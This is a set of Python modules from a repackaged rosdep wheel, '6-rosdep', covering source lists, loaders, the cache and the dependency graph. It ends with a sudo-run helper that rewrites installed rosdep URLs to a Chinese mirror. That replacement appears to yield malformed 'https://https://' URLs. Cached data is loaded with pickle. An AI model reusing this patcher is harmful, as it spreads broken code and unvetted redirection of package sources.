return repr((self.type, self.url, self.tags, self.rosdep_data, self.origin))
@property
def type(self):
"""
:returns: data source type
"""
return self.source.type
@property
def url(self):
"""
:returns: data source URL
"""
return self.source.url
@property
def tags(self):
"""
:returns: data source tags
"""
return self.source.tags
@property
def origin(self):
"""
:returns: data source origin, if set, or ``None``
"""
return self.source.origin
class DataSourceMatcher(object):
def __init__(self, tags):
self.tags = tags
def matches(self, rosdep_data_source):
"""
Check if the datasource matches this configuration.
:param rosdep_data_source: :class:`DataSource`
"""
# all of the rosdep_data_source tags must be in our matcher tags
return not any(set(rosdep_data_source.tags) - set(self.tags))
@staticmethod
def create_default(os_override=None):
"""
Create a :class:`DataSourceMatcher` to match the current
configuration.
:param os_override: (os_name, os_codename) tuple to override
OS detection
:returns: :class:`DataSourceMatcher`
"""
distro_name = rospkg.distro.current_distro_codename()
if os_override is None:
os_detect = rospkg.os_detect.OsDetect()
os_name, os_version, os_codename = os_detect.detect_os()
else:
os_name, os_codename = os_override
tags = [t for t in (distro_name, os_name, os_codename) if t]
return DataSourceMatcher(tags)
def download_rosdep_data(url):
"""
:raises: :exc:`DownloadFailure` If data cannot be
retrieved (e.g. 404, bad YAML format, server down).
"""
try:
# http/https URLs need custom requests to specify the user-agent, since some repositories reject
# requests from the default user-agent.
if url.startswith("http://") or url.startswith("https://"):
url_request = request.Request(url, headers={'User-Agent': 'rosdep/{version}'.format(version=__version__)})
else:
url_request = url
f = urlopen(url_request, timeout=DOWNLOAD_TIMEOUT)
text = f.read()
f.close()
data = yaml.safe_load(text)
if type(data) != dict:
raise DownloadFailure('rosdep data from [%s] is not a YAML dictionary' % (url))
return data
except (URLError, httplib.HTTPException) as e:
raise DownloadFailure(str(e) + ' (%s)' % url)
except yaml.YAMLError as e:
raise DownloadFailure(str(e))
def download_default_sources_list(url=DEFAULT_SOURCES_LIST_URL):
"""
Download (and validate) contents of default sources list.
:param url: override URL of default sources list file
:return: raw sources list data, ``str``
:raises: :exc:`DownloadFailure` If data cannot be
retrieved (e.g. 404, bad YAML format, server down).
:raises: :exc:`urllib2.URLError` If data cannot be
retrieved (e.g. 404, server down).
"""
try:
f = urlopen(url, timeout=DOWNLOAD_TIMEOUT)
except (URLError, httplib.HTTPException) as e:
raise URLError(str(e) + ' (%s)' % url)
data = f.read().decode()
f.close()
if not data:
raise DownloadFailure('cannot download defaults file from %s : empty contents' % url)
# parse just for validation
try:
parse_sources_data(data)
except InvalidData as e:
raise DownloadFailure(
'The content downloaded from %s failed to pass validation.'
' It is likely that the source is invalid unless the data was corrupted during the download.'
' The contents were:{{{%s}}} The error raised was: %s' % (url, data, e))
return data
def parse_sources_data(data, origin='<string>', model=None):
"""
Parse sources file format (tags optional)::
# comments and empty lines allowed
<type> <uri> [tags]
e.g.::
yaml http://foo/rosdep.yaml fuerte lucid ubuntu
If tags are specified, *all* tags must match the current
configuration for the sources data to be used.
:param data: data in sources file format
:param model: model to load data into. Defaults to :class:`DataSource`
:returns: List of data sources, [:class:`DataSource`]
:raises: :exc:`InvalidData`
"""
if model is None:
model = DataSource
sources = []
for line in data.split('\n'):
line = line.strip()
# ignore empty lines or comments
if not line or line.startswith('#'):
continue
splits = line.split(' ')
if len(splits) < 2:
raise InvalidData('invalid line:\n%s' % (line), origin=origin)
type_ = splits[0]
url = splits[1]
tags = splits[2:]
try:
sources.append(model(type_, url, tags, origin=origin))
except ValueError as e:
raise InvalidData('line:\n\t%s\n%s' % (line, e), origin=origin)
return sources
def parse_sources_file(filepath):
"""
Parse file on disk
:returns: List of data sources, [:class:`DataSource`]
:raises: :exc:`InvalidData` If any error occurs reading
file, so an I/O error, non-existent file, or invalid format.
"""
try:
with open(filepath, 'r') as f:
return parse_sources_data(f.read(), origin=filepath)
except IOError as e:
raise InvalidData('I/O error reading sources file: %s' % (str(e)), origin=filepath)
def parse_sources_list(sources_list_dir=None):
"""
Parse data stored in on-disk sources list directory into a list of
:class:`DataSource` for processing.
:returns: List of data sources, [:class:`DataSource`]. If there is
no sources list dir, this returns an empty list.
:raises: :exc:`InvalidData`
:raises: :exc:`OSError` if *sources_list_dir* cannot be read.
:raises: :exc:`IOError` if *sources_list_dir* cannot be read.
"""
if sources_list_dir is None:
sources_list_dir = get_sources_list_dir()
sources_list_dirs = get_sources_list_dirs(sources_list_dir)
filelist = []
for sdir in sources_list_dirs:
filelist += sorted([os.path.join(sdir, f) for f in os.listdir(sdir) if f.endswith('.list')])
sources_list = []
for f in filelist:
sources_list.extend(parse_sources_file(f))
return sources_list
def _generate_key_from_urls(urls):
# urls may be a list of urls or a single string
try:
assert isinstance(urls, (list, basestring))
except NameError:
assert isinstance(urls, (list, str))
# We join the urls by the '^' character because it is not allowed in urls
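    # e.g. _generate_key_from_urls(['http://a/x', 'http://b/y']) -> 'http://a/x^http://b/y'
    #      _generate_key_from_urls('http://a/x') -> 'http://a/x'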
return '^'.join(urls if isinstance(urls, list) else [urls])
def update_sources_list(sources_list_dir=None, sources_cache_dir=None,
success_handler=None, error_handler=None,
skip_eol_distros=False, ros_distro=None):
"""
Re-downloaded data from remote sources and store in cache. Also
update the cache index based on current sources.
:param sources_list_dir: override source list directory
:param sources_cache_dir: override sources cache directory
:param success_handler: fn(DataSource) to call if a particular
source loads successfully. This hook is mainly for printing
errors to console.
:param error_handler: fn(DataSource, DownloadFailure) to call
if a particular source fails. This hook is mainly for
printing errors to console.
:param skip_eol_distros: skip downloading sources for EOL distros
    :returns: list of (`DataSource`, cache_file_path) pairs for cache
        files that were updated, ``[(DataSource, str)]``
:raises: :exc:`InvalidData` If any of the sources list files is invalid
:raises: :exc:`OSError` if *sources_list_dir* cannot be read.
:raises: :exc:`IOError` If *sources_list_dir* cannot be read or cache data cannot be written
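    Example (sketch; the handlers mirror the ones used by ``rosdep update``)::
        def on_success(source):
            print('Hit %s' % source.url)
        def on_error(source, exc):
            print('ERROR: %s: %s' % (source.url, exc))
        update_sources_list(success_handler=on_success, error_handler=on_error)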
"""
if sources_cache_dir is None:
sources_cache_dir = get_sources_cache_dir()
sources = parse_sources_list(sources_list_dir=sources_list_dir)
retval = []
for source in list(sources):
try:
if source.type == TYPE_YAML:
rosdep_data = download_rosdep_data(source.url)
elif source.type == TYPE_GBPDISTRO: # DEPRECATED, do not use this file. See REP137
if not source.tags[0] in ['electric', 'fuerte']:
print('Ignore legacy gbpdistro "%s"' % source.tags[0])
sources.remove(source)
continue # do not store this entry in the cache
rosdep_data = download_gbpdistro_as_rosdep_data(source.url)
retval.append((source, write_cache_file(sources_cache_dir, source.url, rosdep_data)))
if success_handler is not None:
success_handler(source)
except DownloadFailure as e:
if error_handler is not None:
error_handler(source, e)
# Additional sources for ros distros
# In compliance with REP137 and REP143
python_versions = {}
print('Query rosdistro index %s' % get_index_url())
distribution_names = get_index().distributions.keys()
if ros_distro is not None and ros_distro not in distribution_names:
raise ValueError(
'Requested distribution "%s" is not in the index.' % ros_distro)
for dist_name in sorted(distribution_names):
distribution = get_index().distributions[dist_name]
if dist_name != ros_distro:
if ros_distro is not None:
print('Skip distro "%s" different from requested "%s"' % (dist_name, ros_distro))
continue
if skip_eol_distros:
if distribution.get('distribution_status') == 'end-of-life':
print('Skip end-of-life distro "%s"' % dist_name)
continue
print('Add distro "%s"' % dist_name)
rds = RosDistroSource(dist_name)
rosdep_data = get_gbprepo_as_rosdep_data(dist_name)
# Store Python version from REP153
if distribution.get('python_version'):
python_versions[dist_name] = distribution.get('python_version')
# dist_files can either be a string (single filename) or a list (list of filenames)
dist_files = distribution['distribution']
key = _generate_key_from_urls(dist_files)
retval.append((rds, write_cache_file(sources_cache_dir, key, rosdep_data)))
sources.append(rds)
# cache metadata that isn't a source list
MetaDatabase().set('ROS_PYTHON_VERSION', python_versions)
# Create a combined index of *all* the sources. We do all the
# sources regardless of failures because a cache from a previous
# attempt may still exist. We have to do this cache index so that
# loads() see consistent data.
if not os.path.exists(sources_cache_dir):
os.makedirs(sources_cache_dir)
cache_index = os.path.join(sources_cache_dir, CACHE_INDEX)
data = "#autogenerated by rosdep, do not edit. use 'rosdep update' instead\n"
for source in sources:
url = _generate_key_from_urls(source.url)
data += 'yaml %s %s\n' % (url, ' '.join(source.tags))
write_atomic(cache_index, data)
# mainly for debugging and testing
return retval
def load_cached_sources_list(sources_cache_dir=None, verbose=False):
"""
Load cached data based on the sources list.
:returns: list of :class:`CachedDataSource` instance with raw
rosdep data loaded.
:raises: :exc:`OSError` if cache cannot be read
:raises: :exc:`IOError` if cache cannot be read
"""
if sources_cache_dir is None:
sources_cache_dir = get_sources_cache_dir()
cache_index = os.path.join(sources_cache_dir, 'index')
if not os.path.exists(cache_index):
if verbose:
print('no cache index present, not loading cached sources', file=sys.stderr)
return []
try:
with open(cache_index, 'r') as f:
cache_data = f.read()
except IOError as e:
        if e.strerror == 'Permission denied':
            raise CachePermissionError('Failed to read cache file: ' + str(e))
else:
raise
# the loader does all the work
model = cache_data_source_loader(sources_cache_dir, verbose=verbose)
return parse_sources_data(cache_data, origin=cache_index, model=model)
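# Illustrative usage sketch (not part of the original module); it assumes
# `rosdep update` has already populated the default sources cache:
#
#     sources = load_cached_sources_list(verbose=True)
#     for source in sources:
#         print(source.url, source.tags)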
class SourcesListLoader(RosdepLoader):
"""
SourcesList loader implements the general RosdepLoader API. This
implementation is fairly simple as there is only one view the
source list loader can create. It is also a bit degenerate as it
is not capable of mapping resource names to views, thus any
resource-name-based API fails or returns nothing interesting.
This loader should not be used directly; instead, it is more
useful composed with other higher-level implementations, like the
:class:`rosdep2.rospkg_loader.RospkgLoader`. The general intent
is to compose it with another loader by making all of the other
    loader's views depend on all the views in this loader.
"""
ALL_VIEW_KEY = 'sources.list'
def __init__(self, sources):
"""
:param sources: cached sources list entries, [:class:`CachedDataSource`]
"""
self.sources = sources
@staticmethod
def create_default(matcher=None, sources_cache_dir=None, os_override=None, verbose=False):
"""
:param matcher: override DataSourceMatcher. Defaults to
DataSourceMatcher.create_default().
:param sources_cache_dir: override location of sources cache
"""
if matcher is None:
matcher = DataSourceMatcher.create_default(os_override=os_override)
if verbose:
print('using matcher with tags [%s]' % (', '.join(matcher.tags)), file=sys.stderr)
sources = load_cached_sources_list(sources_cache_dir=sources_cache_dir, verbose=verbose)
if verbose:
print('loaded %s sources' % (len(sources)), file=sys.stderr)
sources = [x for x in sources if matcher.matches(x)]
if verbose:
print('%s sources match current tags' % (len(sources)), file=sys.stderr)
return SourcesListLoader(sources)
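    # Illustrative usage sketch (not part of the original class); it assumes a
    # populated sources cache and default OS detection:
    #
    #     loader = SourcesListLoader.create_default(verbose=True)
    #     print(loader.get_loadable_views())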
def load_view(self, view_name, rosdep_db, verbose=False):
"""
Load view data into rosdep_db. If the view has already been
loaded into rosdep_db, this method does nothing.
:param view_name: name of ROS stack to load, ``str``
:param rosdep_db: database to load stack data into, :class:`RosdepDatabase`
:raises: :exc:`InvalidData`
"""
if rosdep_db.is_loaded(view_name):
return
source = self.get_source(view_name)
if verbose:
print('loading view [%s] with sources.list loader' % (view_name), file=sys.stderr)
view_dependencies = self.get_view_dependencies(view_name)
rosdep_db.set_view_data(view_name, source.rosdep_data, view_dependencies, view_name)
def get_loadable_resources(self):
return []
def get_loadable_views(self):
return [x.url for x in self.sources]
def get_view_dependencies(self, view_name):
# use dependencies to implement precedence
if view_name != SourcesListLoader.ALL_VIEW_KEY:
# if the view_name matches one of our sources, return
# empty list as none of our sources has deps.
if any([x for x in self.sources if view_name == x.url]):
return []
# not one of our views, so it depends on everything we provide
return [x.url for x in self.sources]
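    # Illustrative sketch of the precedence scheme above (not part of the
    # original class), assuming two cached sources s1 and s2:
    #
    #     loader = SourcesListLoader([s1, s2])
    #     loader.get_view_dependencies(s1.url)  # -> []
    #     loader.get_view_dependencies(SourcesListLoader.ALL_VIEW_KEY)  # -> [s1.url, s2.url]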
def get_source(self, view_name):
matches = [x for x in self.sources if x.url == view_name]
if matches:
return matches[0]
else:
raise rospkg.ResourceNotFound(view_name)
def get_rosdeps(self, resource_name, implicit=True):
"""
        Always raises, as SourcesListLoader defines no concrete resources with rosdeps.
:raises: :exc:`rospkg.ResourceNotFound`
"""
raise rospkg.ResourceNotFound(resource_name)
def get_view_key(self, resource_name):
"""
        Always raises, as SourcesListLoader defines no concrete resources with rosdeps.
:returns: Name of view that *resource_name* is in, ``None`` if no associated view.
:raises: :exc:`rospkg.ResourceNotFound` if *resource_name* cannot be found.
"""
raise rospkg.ResourceNotFound(resource_name) | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/sources_list.py | sources_list.py |
# Author Ken Conley/[email protected]
"""
Library for loading rosdep files from the ROS package/stack
filesystem.
"""
from __future__ import print_function
import os
import catkin_pkg.package
import rospkg
from .catkin_packages import VALID_DEPENDENCY_TYPES
from .loader import RosdepLoader
# Default view key is the view that packages that are not in stacks
# see. It is the root of all dependencies. It is superseded by an
# explicit underlay_key.
DEFAULT_VIEW_KEY = '*default*'
# Implementation details: this API was originally conceived under the
# rosdep 1 design. It has since been retrofitted for the rosdep 2
# design, which means it is a bit overbuilt. There really is no need
# for a notion of views for rospkg -- all rospkgs have the same view.
# It would be nice to refactor this API into something much, much
# simpler, which would probably involve merging RosPkgLoader and
# SourcesListLoader. RosPkgLoader would provide identification of
# resources and SourcesListLoader would build a *single* view that was
# no longer resource-dependent.
class RosPkgLoader(RosdepLoader):
def __init__(self, rospack=None, rosstack=None, underlay_key=None, dependency_types=[]):
"""
:param underlay_key: If set, all views loaded by this loader
will depend on this key.
"""
if rospack is None:
rospack = rospkg.RosPack()
if rosstack is None:
rosstack = rospkg.RosStack()
self._rospack = rospack
self._rosstack = rosstack
self._rosdep_yaml_cache = {}
self._underlay_key = underlay_key
# cache computed list of loadable resources
self._loadable_resource_cache = None
self._catkin_packages_cache = None
default_dep_types = VALID_DEPENDENCY_TYPES - {'doc'}
self.include_dep_types = VALID_DEPENDENCY_TYPES.intersection(set(dependency_types)) if dependency_types else default_dep_types
def load_view(self, view_name, rosdep_db, verbose=False):
"""
Load view data into *rosdep_db*. If the view has already
been loaded into *rosdep_db*, this method does nothing. If
view has no rosdep data, it will be initialized with an empty
data map.
:raises: :exc:`InvalidData` if view rosdep.yaml is invalid
:raises: :exc:`rospkg.ResourceNotFound` if view cannot be located
:returns: ``True`` if view was loaded. ``False`` if view
was already loaded.
"""
if rosdep_db.is_loaded(view_name):
return
if view_name not in self.get_loadable_views():
raise rospkg.ResourceNotFound(view_name)
elif view_name == 'invalid':
raise rospkg.ResourceNotFound('FOUND' + view_name + str(self.get_loadable_views()))
if verbose:
print('loading view [%s] with rospkg loader' % (view_name))
# chain into underlay if set
if self._underlay_key:
view_dependencies = [self._underlay_key]
else:
view_dependencies = []
# no rospkg view has actual data
rosdep_db.set_view_data(view_name, {}, view_dependencies, '<nodata>')
def get_loadable_views(self):
"""
'Views' map to ROS stack names.
"""
return list(self._rosstack.list()) + [DEFAULT_VIEW_KEY]
def get_loadable_resources(self):
"""
        'Resources' map to ROS package names.
"""
if not self._loadable_resource_cache:
self._loadable_resource_cache = list(self._rospack.list())
return self._loadable_resource_cache
def get_catkin_paths(self):
if not self._catkin_packages_cache:
def find_catkin_paths(src):
return map(lambda x: (x, src.get_path(x)),
filter(lambda x: src.get_manifest(x).is_catkin, src.list()))
self._catkin_packages_cache = dict(find_catkin_paths(self._rospack))
self._catkin_packages_cache.update(find_catkin_paths(self._rosstack))
return self._catkin_packages_cache
def get_rosdeps(self, resource_name, implicit=True):
"""
If *resource_name* is a stack, returns an empty list.
:raises: :exc:`rospkg.ResourceNotFound` if *resource_name* cannot be found.
"""
if resource_name in self.get_catkin_paths():
pkg = catkin_pkg.package.parse_package(self.get_catkin_paths()[resource_name])
pkg.evaluate_conditions(os.environ)
deps = sum((getattr(pkg, '{}_depends'.format(d)) for d in self.include_dep_types), [])
return [d.name for d in deps if d.evaluated_condition]
elif resource_name in self.get_loadable_resources():
rosdeps = set(self._rospack.get_rosdeps(resource_name, implicit=False))
if implicit:
# This resource is a manifest.xml, but it might depend on things with a package.xml
# Make sure they get a chance to evaluate conditions
for dep in self._rospack.get_depends(resource_name):
rosdeps = rosdeps.union(set(self.get_rosdeps(dep, implicit=True)))
return list(rosdeps)
elif resource_name in self._rosstack.list():
# stacks currently do not have rosdeps of their own, implicit or otherwise
return []
else:
raise rospkg.ResourceNotFound(resource_name)
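    # Illustrative usage sketch (not part of the original class); 'my_pkg' is a
    # placeholder for a catkin package on the local ROS package path:
    #
    #     loader = RosPkgLoader(dependency_types=['build', 'exec'])
    #     loader.get_rosdeps('my_pkg')  # e.g. ['roscpp', 'std_msgs']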
def is_metapackage(self, resource_name):
if resource_name in self._rosstack.list():
m = self._rosstack.get_manifest(resource_name)
return m.is_catkin
return False
def get_view_key(self, resource_name):
"""
        Map *resource_name* to a view key. In rospkg, this maps to
        DEFAULT_VIEW_KEY if *resource_name* exists.
:raises: :exc:`rospkg.ResourceNotFound`
"""
if (
resource_name in self.get_catkin_paths() or
resource_name in self.get_loadable_resources()
):
return DEFAULT_VIEW_KEY
else:
raise rospkg.ResourceNotFound(resource_name) | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/rospkg_loader.py | rospkg_loader.py |
import copy
import os
try:
import cPickle as pickle
except ImportError:
import pickle
try:
FileNotFoundError
except NameError:
# Python 2 compatibility
# https://stackoverflow.com/questions/21367320/
FileNotFoundError = IOError
import rospkg
from ._version import __version__
from .cache_tools import compute_filename_hash
from .cache_tools import write_cache_file
from .cache_tools import PICKLE_CACHE_EXT
"""
Rosdep needs to store data that isn't used to resolve rosdep keys, but needs to be cached during
`rosdep update`.
"""
META_CACHE_DIR = 'meta.cache'
def get_meta_cache_dir():
"""Return storage location for cached meta data."""
ros_home = rospkg.get_ros_home()
return os.path.join(ros_home, 'rosdep', META_CACHE_DIR)
class CacheWrapper(object):
"""Make it possible to introspect cache in case some future bug needs to be worked around."""
def __init__(self, category, data):
# The version of rosdep that wrote the category
self.rosdep_version = __version__
# The un-hashed name of the category
self.category_name = category
# The stuff being stored
self.data = data
@property
def data(self):
# If cached data type is mutable, don't allow modifications to what's been loaded
return copy.deepcopy(self.__data)
@data.setter
def data(self, value):
self.__data = copy.deepcopy(value)
class MetaDatabase:
"""
Store and retrieve metadata from rosdep cache.
This data is fetched during `rosdep update`, but is not a source for resolving rosdep keys.
"""
def __init__(self, cache_dir=None):
if cache_dir is None:
cache_dir = get_meta_cache_dir()
self._cache_dir = cache_dir
self._loaded = {}
def set(self, category, metadata):
"""Add or overwrite metadata in the cache."""
wrapper = CacheWrapper(category, metadata)
# print(category, metadata)
write_cache_file(self._cache_dir, category, wrapper)
self._loaded[category] = wrapper
def get(self, category, default=None):
"""Return metadata in the cache, or None if there is no cache entry."""
if category not in self._loaded:
self._load_from_cache(category, self._cache_dir)
if category in self._loaded:
return self._loaded[category].data
return default
def _load_from_cache(self, category, cache_dir):
filename = compute_filename_hash(category) + PICKLE_CACHE_EXT
try:
with open(os.path.join(self._cache_dir, filename), 'rb') as cache_file:
self._loaded[category] = pickle.loads(cache_file.read())
except FileNotFoundError:
pass | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/meta.py | meta.py |
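# Illustrative usage sketch (not part of the original module); it writes to the
# default cache location under ROS_HOME, so that directory must be writable:
#
#     db = MetaDatabase()
#     db.set('ROS_PYTHON_VERSION', {'noetic': '3'})
#     db.get('ROS_PYTHON_VERSION')  # -> {'noetic': '3'}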
# Author Ken Conley/[email protected]
"""
Underlying model of rosdep data. The basic data model of rosdep is to
store a dictionary of data indexed by view name (i.e. ROS stack name).
This data includes a dictionary mapping rosdep dependency names to
rules and the view dependencies.
This is a lower-level representation. Higher-level representation can
combine these rosdep dependency maps and view dependencies together
into a combined view on which queries can be made.
"""
class RosdepDatabaseEntry(object):
"""
Stores rosdep data and metadata for a single view.
"""
def __init__(self, rosdep_data, view_dependencies, origin):
"""
:param rosdep_data: raw rosdep dictionary map for view
:param view_dependencies: list of view dependency names
:param origin: name of where data originated, e.g. filename
"""
assert isinstance(rosdep_data, dict), 'RosdepDatabaseEntry() rosdep_data is not a dict: %s' % rosdep_data
self.rosdep_data = rosdep_data
self.view_dependencies = view_dependencies
self.origin = origin
class RosdepDatabase(object):
"""
Stores loaded rosdep data for multiple views.
"""
def __init__(self):
self._rosdep_db = {} # {view_name: RosdepDatabaseEntry}
def is_loaded(self, view_name):
"""
:param view_name: name of view to check, ``str``
:returns: ``True`` if *view_name* has been loaded into this
database.
"""
return view_name in self._rosdep_db
def mark_loaded(self, view_name):
"""
If view is not already loaded, this will mark it as such. This in effect sets the data for the view to be empty.
:param view_name: name of view to mark as loaded
"""
self.set_view_data(view_name, {}, [], None)
def set_view_data(self, view_name, rosdep_data, view_dependencies, origin):
"""
Set data associated with view. This will create a new
:class:`RosdepDatabaseEntry`.
:param rosdep_data: rosdep data map to associated with view.
This will be copied.
:param origin: origin of view data, e.g. filepath of ``rosdep.yaml``
"""
self._rosdep_db[view_name] = RosdepDatabaseEntry(rosdep_data.copy(), view_dependencies, origin)
def get_view_names(self):
"""
:returns: list of view names that are loaded into this database.
"""
return self._rosdep_db.keys()
def get_view_data(self, view_name):
"""
:returns: :class:`RosdepDatabaseEntry` of given view.
:raises: :exc:`KeyError` if no entry for *view_name*
"""
return self._rosdep_db[view_name]
def get_view_dependencies(self, view_name):
"""
:raises: :exc:`KeyError` if *view_name* is not an entry, or if
all of view's dependencies have not been properly loaded.
"""
entry = self.get_view_data(view_name)
dependencies = entry.view_dependencies[:]
# compute full set of dependencies by iterating over
# dependencies in reverse order and prepending.
for s in reversed(entry.view_dependencies):
dependencies = self.get_view_dependencies(s) + dependencies
# make unique preserving order
unique_deps = []
for d in dependencies:
if d not in unique_deps:
unique_deps.append(d)
return unique_deps | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/model.py | model.py |
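# Illustrative usage sketch (not part of the original module), showing how view
# dependencies accumulate across entries:
#
#     db = RosdepDatabase()
#     db.set_view_data('base', {'boost': {}}, [], 'base.yaml')
#     db.set_view_data('robot', {'opencv': {}}, ['base'], 'robot.yaml')
#     db.get_view_dependencies('robot')  # -> ['base']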
# Author Tully Foote/[email protected], Ken Conley/[email protected]
"""
rosdep library and command-line tool
"""
from __future__ import print_function
from ._version import __version__
import sys
from .installers import InstallerContext, Installer, \
PackageManagerInstaller
from .core import RosdepInternalError, InstallFailed, UnsupportedOs, \
InvalidData, DownloadFailure
from .model import RosdepDatabase, RosdepDatabaseEntry
from .lookup import RosdepDefinition, RosdepView, RosdepLookup, \
ResolutionError
from .loader import RosdepLoader
# don't let an import error take down the code, e.g. when attempting to compute the version number
try:
from .rospkg_loader import RosPkgLoader
except ImportError:
print('Cannot import rospkg, rosdep will not function properly',
file=sys.stderr)
def create_default_installer_context(verbose=False):
from .platforms import alpine
from .platforms import arch
from .platforms import cygwin
from .platforms import debian
from .platforms import gentoo
from .platforms import nix
from .platforms import openembedded
from .platforms import opensuse
from .platforms import osx
from .platforms import pip
from .platforms import npm
from .platforms import gem
from .platforms import redhat
from .platforms import freebsd
from .platforms import slackware
from .platforms import source
platform_mods = [alpine, arch, cygwin, debian, gentoo, nix, openembedded, opensuse, osx, redhat, slackware, freebsd]
installer_mods = [source, pip, gem, npm] + platform_mods
context = InstallerContext()
context.set_verbose(verbose)
# setup installers
for m in installer_mods:
if verbose:
print('registering installers for %s' % (m.__name__))
m.register_installers(context)
# setup platforms
for m in platform_mods:
if verbose:
print('registering platforms for %s' % (m.__name__))
m.register_platforms(context)
return context
from . import gbpdistro_support # noqa
gbpdistro_support.create_default_installer_context = create_default_installer_context
# TODO: this was partially abstracted from main() for another library,
# but it turned out to be unnecessary. Not sure it's worth maintaining
# separately, especially in the top-level module.
def get_default_installer(installer_context=None, verbose=False):
"""
Based on the active OS and installer context configuration, get
the installer to use and the necessary configuration state
(installer keys, OS name/version).
:returns: installer, installer_keys, default_key, os_name, os_version.
"""
if installer_context is None:
installer_context = create_default_installer_context(verbose=verbose)
os_name, os_version = installer_context.get_os_name_and_version()
try:
installer_keys = installer_context.get_os_installer_keys(os_name)
default_key = installer_context.get_default_os_installer_key(os_name)
except KeyError:
raise UnsupportedOs(os_name, installer_context.get_os_keys())
installer = installer_context.get_installer(default_key)
return installer, installer_keys, default_key, os_name, os_version
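# Illustrative usage sketch (not part of the original module); the exact values
# depend on the detected OS:
#
#     installer, keys, default_key, os_name, os_version = get_default_installer()
#     # e.g. on Ubuntu: default_key == 'apt',
#     #                 keys == ['apt', 'pip', 'gem', 'npm', 'source']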
__all__ = [
'InstallerContext', 'Installer', 'PackageManagerInstaller',
'RosdepInternalError', 'InstallFailed', 'UnsupportedOs', 'InvalidData',
'DownloadFailure',
'RosdepDatabase', 'RosdepDatabaseEntry',
'RosdepDefinition', 'RosdepView', 'RosdepLookup', 'ResolutionError',
'RosdepLoader', 'RosPkgLoader',
'get_default_installer',
'create_default_installer_context',
] | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/__init__.py | __init__.py |
# Author William Woodall/[email protected]
from collections import defaultdict
class Resolution(dict):
"""A default dictionary for use in the :class:`DependencyGraph`."""
def __init__(self):
super(Resolution, self).__init__()
self['installer_key'] = None
self['install_keys'] = []
self['dependencies'] = []
self['is_root'] = True
class DependencyGraph(defaultdict):
"""
Provides a mechanism for generating a list of resolutions which preserves the dependency order.
The :class:`DependencyGraph` inherits from a *defaultdict*, so it can be used as such to load
the dependency graph data into it.
Example::
# Dependency graph:: A-B-C
dg = DependencyGraph()
dg['A']['installer_key'] = 'a_installer'
dg['A']['install_keys'] = ['a']
dg['A']['dependencies'] = ['B']
dg['B']['installer_key'] = 'b_installer'
dg['B']['install_keys'] = ['b']
dg['B']['dependencies'] = ['C']
dg['C']['installer_key'] = 'c_installer'
dg['C']['install_keys'] = ['c']
dg['C']['dependencies'] = []
        result = dg.get_ordered_dependency_list()
"""
def __init__(self):
defaultdict.__init__(self, Resolution)
def detect_cycles(self, rosdep_key, traveled_keys):
"""
Recursive function to detect cycles in the dependency graph.
:param rosdep_key: This is the rosdep key to use as the root in the cycle exploration.
:param traveled_keys: A list of rosdep_keys that have been traversed thus far.
:raises: :exc:`AssertionError` if the rosdep_key is in the traveled keys, indicating a cycle has occurred.
"""
assert rosdep_key not in traveled_keys, 'A cycle in the dependency graph occurred with key `%s`.' % rosdep_key
traveled_keys.append(rosdep_key)
for dependency in self[rosdep_key]['dependencies']:
self.detect_cycles(dependency, traveled_keys)
def validate(self):
"""
Performs validations on the dependency graph, like cycle detection and invalid rosdep key detection.
:raises: :exc:`AssertionError` if a cycle is detected.
:raises: :exc:`KeyError` if an invalid rosdep_key is found in the dependency graph.
"""
for rosdep_key in self:
# Ensure all dependencies have definitions
# i.e.: Ensure we aren't pointing to invalid rosdep keys
for dependency in self[rosdep_key]['dependencies']:
if dependency not in self:
raise KeyError(
'Invalid Graph Structure: rosdep key `%s` does not exist in the dictionary of resolutions.'
% dependency)
self[dependency]['is_root'] = False
# Check each entry for cyclical dependencies
for rosdep_key in self:
self.detect_cycles(rosdep_key, [])
def get_ordered_dependency_list(self):
"""
Generates an ordered list of dependencies using the dependency graph.
:returns: *[(installer_key, [install_keys])]*, ``[(str, [str])]``. *installer_key* is the key
        that denotes which installer the accompanying *install_keys* are for. *installer_key* is something
        like ``apt`` or ``homebrew``. *install_keys* are something like ``boost`` or ``ros-fuerte-ros_comm``.
:raises: :exc:`AssertionError` if a cycle is detected.
:raises: :exc:`KeyError` if an invalid rosdep_key is found in the dependency graph.
"""
# Validate the graph
self.validate()
# Generate the dependency list
dep_list = []
for rosdep_key in self:
if self[rosdep_key]['is_root']:
dep_list.extend(self.__get_ordered_uninstalled(rosdep_key))
# Make the list unique and remove empty entries
result = []
for item in dep_list:
if item not in result and item[1] != []:
result.append(item)
# Squash the results by installer_key
squashed_result = []
previous_installer_key = None
for installer_key, resolved in result:
if previous_installer_key != installer_key:
squashed_result.append((installer_key, []))
previous_installer_key = installer_key
squashed_result[-1][1].extend(resolved)
return squashed_result
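    # Illustrative sketch (not part of the original class): for the A-B-C graph
    # from the class docstring above, dependencies come before dependents, e.g.
    #
    #     [('c_installer', ['c']), ('b_installer', ['b']), ('a_installer', ['a'])]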
def __get_ordered_uninstalled(self, key):
uninstalled = []
for dependency in self[key]['dependencies']:
uninstalled.extend(self.__get_ordered_uninstalled(dependency))
uninstalled.append((self[key]['installer_key'], self[key]['install_keys']))
return uninstalled | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/dependency_graph.py | dependency_graph.py |
import os
import sys
def fix_uri( file ):
    print('Opening file: ' + file)
try:
src_file = open(file, 'r')
except IOError:
        print('\n[!] Patching failed... please make sure the command was run with sudo.\n---------------------\nCorrect commands:\nsudo pip install 6-rosdep\nsudo 6-rosdep\n---------------------\n')
return False
else:
if src_file:
            print('Switching rosdep to a mirror hosted in China...')
contents = src_file.read()
            # back up the original contents
backup_exists = os.path.exists(file + '.bak')
if backup_exists is False:
backup_file = open(file + '.bak', 'w')
backup_file.write(contents)
backup_file.close()
            # replace the contents
src_file.close()
src_file = open(file, 'w')
#new_contents = contents.replace("raw.githubusercontent.com/ros/rosdistro","gitee.com/fuckrosdep/rosdistro/raw")
new_contents = contents.replace("raw.githubusercontent.com/ros/rosdistro","https://mirrors.tuna.tsinghua.edu.cn/github-raw/ros/rosdistro")
new_contents2 = new_contents.replace("gitee.com/fuckrosdep/rosdistro/raw","https://mirrors.tuna.tsinghua.edu.cn/github-raw/ros/rosdistro")
#print(new_contents)
src_file.write(new_contents2)
src_file.close()
return True
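# Illustrative sketch of the rewrite performed above (not part of the original
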